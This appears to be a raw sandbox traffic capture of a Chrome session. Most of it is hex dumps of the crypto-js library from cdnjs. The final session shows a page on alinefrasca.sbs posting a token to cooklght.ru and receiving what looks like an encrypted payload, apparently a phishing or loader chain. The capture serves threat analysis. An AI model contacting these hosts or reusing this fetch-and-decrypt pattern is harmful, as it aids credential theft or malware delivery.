                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36
                                                                            Data Ascii: *2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43
                                                                            Data Ascii: m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63
                                                                            Data Ascii: call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c
                                                                            2024-10-28 08:36:37 UTC1369INData Raw: 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42
                                                                            Data Ascii: tion(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.449775104.17.24.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:39 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:39 UTC970INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:39 GMT
                                                                            Content-Type: application/javascript; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: W/"5eb03e2d-bb78"
                                                                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 315089
                                                                            Expires: Sat, 18 Oct 2025 08:36:39 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wV4s7jn5F%2FeySM%2FGIv5jrVen8vmpMttlNh%2Fyqcr%2FNYPCDhEvn%2FR%2BGOX%2FjaGWKsUGWLuxliw6DzKnSBctO1B146dwkkAB2TMSxJ72ip%2FRBVPQzbvV2ft%2FsXmWX41M4HdZOac3BOGH"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999970df346bac-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:39 UTC399INData Raw: 37 62 65 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                            Data Ascii: 7be7!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 2e 63 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69
                                                                            Data Ascii: .crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("functi
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c
                                                                            Data Ascii: )for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 28 74 3d 64 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68
                                                                            Data Ascii: (t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)th
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 72 3f 28 72 3d 30 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30
                                                                            Data Ascii: r?(r=0,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 38 38 36 32 36 33 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31
                                                                            Data Ascii: 886263092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48
                                                                            Data Ascii: At(o)]>>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 2c 48 5b 32 37 5d 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75
                                                                            Data Ascii: ,H[27]),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 76 61 72 20 74 3d 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73
                                                                            Data Ascii: var t=i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s
                                                                            2024-10-28 08:36:39 UTC1369INData Raw: 48 65 6c 70 65 72 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e
                                                                            Data Ascii: Helper(o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.449777104.21.91.1454431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:40 UTC601OUTPOST // HTTP/1.1
                                                                            Host: cooklght.ru
                                                                            Connection: keep-alive
                                                                            Content-Length: 20
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-platform: "Windows"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Content-Type: text/plain;charset=UTF-8
                                                                            Accept: */*
                                                                            Origin: https://alinefrasca.sbs
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:40 UTC20OUTData Raw: 7b 22 77 61 67 67 69 73 68 22 3a 22 64 61 63 74 79 6c 22 7d
                                                                            Data Ascii: {"waggish":"dactyl"}
                                                                            2024-10-28 08:36:42 UTC841INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:42 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.3.33
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbdrcAEsalAjZD4AjXniFJnsz1HjjlH6KSVg4CWU8sOI5MDYPJI2JtPHaF8r39DIyog%2B2jnHb5HqjcC0jn%2Bc8Fo3Kdux4HYKyhKJDq6u9wonYVMWO6d9LW4C0QlbLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999978be13e82b-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1221&delivery_rate=2132547&cwnd=251&unsent_bytes=0&cid=ad8ea212ef1b465a&ts=2613&x=0"
                                                                            2024-10-28 08:36:42 UTC528INData Raw: 32 36 65 61 0d 0a 7b 22 61 22 3a 22 73 46 6a 33 34 4d 6b 38 58 52 52 52 53 4e 30 7a 4e 72 74 4a 64 6e 74 70 45 73 6d 69 43 66 59 48 4a 73 72 42 56 4c 77 38 68 35 6b 45 52 54 34 30 76 76 61 6b 6d 70 43 48 37 61 52 75 63 67 55 63 61 5a 4d 33 6a 33 37 74 69 4b 4d 66 2b 5c 2f 55 38 30 49 52 75 69 46 75 6b 67 5a 69 62 4f 4e 38 5c 2f 5a 74 79 32 47 73 68 56 4a 2b 4b 59 31 58 62 77 35 67 42 4c 48 75 6f 35 48 63 70 6b 69 49 33 5a 76 69 4e 6b 2b 67 72 47 6c 50 5a 41 56 32 62 33 33 44 33 76 77 79 62 36 62 73 69 42 75 5c 2f 4d 61 2b 6f 39 68 6c 6c 35 2b 42 6a 57 34 6b 4b 6a 7a 48 6f 58 36 63 50 38 36 46 4f 36 49 57 71 58 68 33 72 30 66 45 31 4e 6f 65 32 74 61 6b 55 70 63 4e 52 48 52 5a 72 6f 33 66 4f 6f 76 6f 44 42 42 7a 37 35 76 63 33 69 38 51 6f 66 30 30 37 6a 68
                                                                            Data Ascii: 26ea{"a":"sFj34Mk8XRRRSN0zNrtJdntpEsmiCfYHJsrBVLw8h5kERT40vvakmpCH7aRucgUcaZM3j37tiKMf+\/U80IRuiFukgZibON8\/Zty2GshVJ+KY1Xbw5gBLHuo5HcpkiI3ZviNk+grGlPZAV2b33D3vwyb6bsiBu\/Ma+o9hll5+BjW4kKjzHoX6cP86FO6IWqXh3r0fE1Noe2takUpcNRHRZro3fOovoDBBz75vc3i8Qof007jh
